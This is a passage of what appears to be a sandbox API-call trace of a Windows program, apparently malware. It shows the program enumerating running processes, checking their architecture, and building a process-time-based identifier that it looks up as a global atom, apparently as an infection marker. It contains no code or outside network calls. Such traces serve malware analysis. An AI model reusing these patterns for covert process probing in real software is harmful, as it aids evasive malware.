	[0127.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2dc
	[0127.804] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.804] CloseHandle (hObject=0x2dc) returned 1
	[0127.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2dc
	[0127.804] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.804] CloseHandle (hObject=0x2dc) returned 1
	[0127.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2dc
	[0127.804] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.804] CloseHandle (hObject=0x2dc) returned 1
	[0127.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0127.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2dc
	[0127.805] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.805] CloseHandle (hObject=0x2dc) returned 1
	[0127.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2dc
	[0127.805] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.805] CloseHandle (hObject=0x2dc) returned 1
	[0127.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2dc
	[0127.806] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.806] CloseHandle (hObject=0x2dc) returned 1
	[0127.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2dc
	[0127.806] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.806] CloseHandle (hObject=0x2dc) returned 1
	[0127.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2dc
	[0127.807] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.807] CloseHandle (hObject=0x2dc) returned 1
	[0127.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2dc
	[0127.807] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.807] CloseHandle (hObject=0x2dc) returned 1
	[0127.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0127.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2dc
	[0127.807] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.807] CloseHandle (hObject=0x2dc) returned 1
	[0127.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0127.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0127.808] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.808] CloseHandle (hObject=0x2dc) returned 1
	[0127.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2dc
	[0127.808] GetLastError () returned 0x5
	[0127.808] GetLastError () returned 0x5
	[0127.808] GetLastError () returned 0x5
	[0127.808] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.809] GetLastError () returned 0x5
	[0127.810] GetLastError () returned 0x5
	[0127.810] GetLastError () returned 0x5
	[0127.810] GetLastError () returned 0x5
	[0127.810] GetLastError () returned 0x5
	[0127.810] GetLastError () returned 0x5
	[0127.810] GetLastError () returned 0x5
	[0127.810] GetLastError () returned 0x5
	[0127.810] GetLastError () returned 0x5
	[0127.810] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.810] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0127.810] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0127.810] GetLastError () returned 0x5
	[0127.810] GetLastError () returned 0x5
	[0127.810] GetLastError () returned 0x5
	[0127.810] GetLastError () returned 0x5
	[0127.810] GetLastError () returned 0x5
	[0127.810] GetLastError () returned 0x5
	[0127.810] GetLastError () returned 0x5
	[0127.810] GetLastError () returned 0x5
	[0127.810] GetLastError () returned 0x5
	[0127.810] GetLastError () returned 0x5
	[0127.810] GetLastError () returned 0x5
	[0127.810] GetLastError () returned 0x5
	[0127.810] GetLastError () returned 0x5
	[0127.810] GetLastError () returned 0x5
	[0127.810] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.811] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.812] GetLastError () returned 0x5
	[0127.813] GetLastError () returned 0x5
	[0127.813] GetLastError () returned 0x5
	[0127.813] GetLastError () returned 0x5
	[0127.813] GetLastError () returned 0x5
	[0127.813] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.813] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0127.813] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.813] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0127.813] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0127.813] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0127.814] CloseHandle (hObject=0x2dc) returned 1
	[0127.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0127.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x2dc
	[0127.814] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.814] CloseHandle (hObject=0x2dc) returned 1
	[0127.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2dc
	[0127.814] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.814] CloseHandle (hObject=0x2dc) returned 1
	[0127.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x2dc
	[0127.815] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.815] CloseHandle (hObject=0x2dc) returned 1
	[0127.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x2dc
	[0127.815] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.815] CloseHandle (hObject=0x2dc) returned 1
	[0127.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0127.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x2dc
	[0127.816] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.816] CloseHandle (hObject=0x2dc) returned 1
	[0127.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.849] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0127.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0127.849] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0127.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0127.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0127.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0127.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0127.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0127.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0127.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0127.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0127.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0127.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0127.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0127.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0127.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0127.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0127.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0127.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0127.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2dc
	[0127.856] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.856] CloseHandle (hObject=0x2dc) returned 1
	[0127.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0127.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0127.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2dc
	[0127.858] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.858] CloseHandle (hObject=0x2dc) returned 1
	[0127.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0127.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0127.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2dc
	[0127.859] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.859] CloseHandle (hObject=0x2dc) returned 1
	[0127.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
